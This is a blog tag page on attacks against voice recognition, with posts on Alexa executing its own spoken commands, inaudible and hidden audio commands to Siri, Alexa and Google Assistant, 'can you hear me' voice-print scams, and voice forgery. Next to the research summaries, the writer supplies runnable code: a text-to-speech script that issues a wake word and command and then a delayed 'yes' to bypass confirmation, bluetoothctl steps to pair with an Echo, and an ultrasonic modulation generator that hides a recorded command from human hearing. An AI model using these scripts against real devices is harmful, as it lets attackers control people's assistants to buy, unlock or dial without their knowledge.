Entries Tagged "voice recognition"


Hacking Alexa through Alexa’s Speech

An Alexa can respond to voice commands that it itself issues. This can be exploited:

The attack works by using the device’s speaker to issue voice commands. As long as the speech contains the device wake word (usually “Alexa” or “Echo”) followed by a permissible command, the Echo will carry it out, researchers from Royal Holloway, University of London, and Italy’s University of Catania found. Even when devices require verbal confirmation before executing sensitive commands, it’s trivial to bypass the measure by adding the word “yes” about six seconds after issuing the command. Attackers can also exploit what the researchers call the “FVV,” or full volume vulnerability, which allows Echos to make self-issued commands without temporarily reducing the device volume.
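For illustration, here is a minimal Python sketch of that self-issued command sequence, assuming the attacker can already play audio through the Echo’s own speaker (the Bluetooth pairing step quoted below). The wake word and the six-second confirmation delay come from the description above; the library choice (pyttsx3) and the sample command are mine, not the researchers’:

```python
import time
import pyttsx3

WAKE_WORD = "Alexa"

def issue_self_command(command: str, needs_confirmation: bool = False) -> None:
    """Speak a wake word plus command through the compromised audio path."""
    engine = pyttsx3.init()
    engine.say(f"{WAKE_WORD}, {command}")
    engine.runAndWait()
    if needs_confirmation:
        # Sensitive commands prompt for verbal confirmation; per the quoted
        # research, a "yes" about six seconds later is enough.
        time.sleep(6)
        engine.say("yes")
        engine.runAndWait()

# Hypothetical payload, purely for illustration.
issue_self_command("turn off the alarm", needs_confirmation=True)
```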

It does require proximate access, though, at least to set the attack up:

It requires only a few seconds of proximity to a vulnerable device while it’s turned on so an attacker can utter a voice command instructing it to pair with an attacker’s Bluetooth-enabled device. As long as the device remains within radio range of the Echo, the attacker will be able to issue commands.
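A hedged sketch of that setup step, on an attacker’s Linux laptop, assuming the attacker has just spoken a pairing command within earshot so the Echo is in Bluetooth pairing mode. The MAC address is a placeholder; bluetoothctl is the standard BlueZ command-line tool:

```python
import subprocess

# Placeholder address; in practice discovered with "bluetoothctl scan on"
# while the Echo is in pairing mode.
ECHO_MAC = "XX:XX:XX:XX:XX:XX"

# Pair, trust, and connect. Once connected, the Echo behaves as a Bluetooth
# speaker, so any audio the laptop plays (such as the TTS payload above)
# comes out of the Echo and can re-trigger it, from anywhere in radio range.
for verb in ("pair", "trust", "connect"):
    subprocess.run(["bluetoothctl", verb, ECHO_MAC], check=True)
```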

Research paper.

Posted on March 7, 2022 at 6:20 AM

Sending Inaudible Commands to Voice Assistants

Researchers have demonstrated the ability to send inaudible commands to voice assistants like Alexa, Siri, and Google Assistant.

Over the last two years, researchers in China and the United States have begun demonstrating that they can send hidden commands that are undetectable to the human ear to Apple’s Siri, Amazon’s Alexa and Google’s Assistant. Inside university labs, the researchers have been able to secretly activate the artificial intelligence systems on smartphones and smart speakers, making them dial phone numbers or open websites. In the wrong hands, the technology could be used to unlock doors, wire money or buy stuff online, simply with music playing over the radio.

A group of students from the University of California, Berkeley, and Georgetown University showed in 2016 that they could hide commands in white noise played over loudspeakers and through YouTube videos to get smart devices to turn on airplane mode or open a website.

This month, some of those Berkeley researchers published a research paper that went further, saying they could embed commands directly into recordings of music or spoken text. So while a human listener hears someone talking or an orchestra playing, Amazon’s Echo speaker might hear an instruction to add something to your shopping list.
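The two techniques quoted above work quite differently. The first, from the Chinese research (the published “DolphinAttack” work), hides a command in ultrasound: the command is amplitude-modulated onto a carrier above human hearing, and nonlinearity in the device’s microphone demodulates it back into the audible band. A minimal sketch of the modulation step, with placeholder file names, and assuming a high sample rate and an ultrasonic-capable speaker:

```python
import numpy as np
from scipy.io import wavfile

CARRIER_HZ = 25_000  # above human hearing; needs a sample rate of 2x that or more

rate, command = wavfile.read("alexa_command.wav")  # placeholder recording of a command
assert rate >= 2 * CARRIER_HZ, "record or resample at a high rate, e.g. 96 kHz"

command = command.astype(np.float64)
if command.ndim > 1:                     # mix stereo down to mono
    command = command.mean(axis=1)
command /= np.max(np.abs(command))       # normalize to [-1, 1]

# Standard amplitude modulation: the DC offset keeps the envelope
# non-negative, and the microphone's nonlinearity recovers that envelope
# (the spoken command) in the audible band.
t = np.arange(len(command)) / rate
carrier = np.cos(2 * np.pi * CARRIER_HZ * t)
modulated = (1 + command) * carrier / 2

wavfile.write("ultrasonic_payload.wav", rate, (modulated * 32767).astype(np.int16))
```

The Berkeley work hides commands differently: rather than moving them out of the audible band, it optimizes a small adversarial perturbation of ordinary audio so that the recognizer transcribes the attacker’s text while a human hears music or speech. Here is a toy stand-in for that optimization loop; a real attack targets an actual speech-to-text model, and every name below is illustrative:

```python
import torch

torch.manual_seed(0)
audio = torch.randn(16_000)                # stand-in one-second clip (the "music")
recognizer = torch.nn.Linear(16_000, 10)   # stand-in model; NOT a real speech recognizer
target = torch.tensor([3])                 # the attacker's target "transcript" class

delta = torch.zeros_like(audio, requires_grad=True)
opt = torch.optim.Adam([delta], lr=1e-2)
for _ in range(200):
    logits = recognizer(audio + delta).unsqueeze(0)
    # Push the model toward the target while penalizing loud perturbations.
    loss = torch.nn.functional.cross_entropy(logits, target) + 0.1 * delta.norm()
    opt.zero_grad()
    loss.backward()
    opt.step()

print("perturbation RMS:", (delta.detach() ** 2).mean().sqrt().item())
```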

Posted on May 15, 2018 at 6:13 AM

Stealing Voice Prints

This article feels like hyperbole:

The scam has arrived in Australia after being used in the United States and Britain.

The scammer may ask several times “can you hear me?”, to which people would usually reply “yes.”

The scammer is then believed to record the “yes” response and end the call.

That recording of the victim’s voice can then be used to authorise payments or charges in the victim’s name through voice recognition.

Are there really banking systems that use voice recognition of the word “yes” to authenticate? I have never heard of that.
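If such a system did exist, though, the quoted replay attack would defeat it almost by construction. Speaker verification reduces to comparing a stored voiceprint embedding against the embedding of the presented audio, and a recording of the victim scores as well as the victim does. A toy sketch, with a crude spectral “embedding” standing in for a real speaker model:

```python
import numpy as np

def embed(audio: np.ndarray) -> np.ndarray:
    """Crude spectral 'voiceprint'; a real system uses a speaker-embedding model."""
    spectrum = np.abs(np.fft.rfft(audio))
    return spectrum / np.linalg.norm(spectrum)

def verify(enrolled: np.ndarray, presented: np.ndarray, threshold: float = 0.9) -> bool:
    """Accept if the presented audio's embedding matches the enrolled voiceprint."""
    return float(embed(enrolled) @ embed(presented)) >= threshold

rng = np.random.default_rng(0)
enrolled_yes = rng.standard_normal(16_000)  # stand-in for the victim's enrolled "yes"
replayed_yes = enrolled_yes.copy()          # the scammer's recording of that "yes"

print(verify(enrolled_yes, replayed_yes))   # True: the replay passes
```

Nothing in such an embedding distinguishes a live speaker from a playback, which is why serious voice-authentication systems rely on randomized prompted phrases and liveness detection rather than a fixed word.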

Posted on May 12, 2017 at 6:00 AM

Forging Voice

LyreBird is a system that can accurately reproduce someone’s voice, given a large number of sample recordings. It’s pretty good—listen to the demo here—and it will only get better over time.

The applications for recorded-voice forgeries are obvious, but I think the larger security risk will be real-time forgery. Imagine the social engineering implications of an attacker on the telephone being able to impersonate someone the victim knows.

I don’t think we’re ready for this. We use people’s voices to authenticate them all the time, in all sorts of different ways.

EDITED TO ADD (5/11): This is a 2003 article on the same topic.

Posted on May 4, 2017 at 10:31 AM
